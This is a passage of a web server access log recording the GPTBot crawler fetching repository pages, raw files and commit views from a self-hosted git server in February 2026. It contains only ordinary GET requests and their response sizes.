"/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 148058] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71830] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71825] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15179] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10481] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fDOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 31618] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fMIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 35926] [Gzip 7.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" [Client 74.7.227.38] [Length 11642] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" [Client 74.7.227.38] [Length 9865] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" -[17/Feb/2026:13:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:13:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151603] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153443] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14878] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" -[17/Feb/2026:13:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:13:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 19735] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:13:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:13:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" -[17/Feb/2026:13:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" -[17/Feb/2026:13:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11699] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11706] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11682] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11705] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" -[17/Feb/2026:13:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" -[17/Feb/2026:13:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" -[17/Feb/2026:13:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" -[17/Feb/2026:13:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 22471] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" -[17/Feb/2026:13:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" -[17/Feb/2026:13:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" -[17/Feb/2026:13:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..main" [Client 74.7.227.38] [Length 8376] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13143] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" -[17/Feb/2026:13:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker" [Client 74.7.227.38] [Length 190774] [Gzip 12.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup" [Client 74.7.227.38] [Length 105627] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:13:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 11081] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] 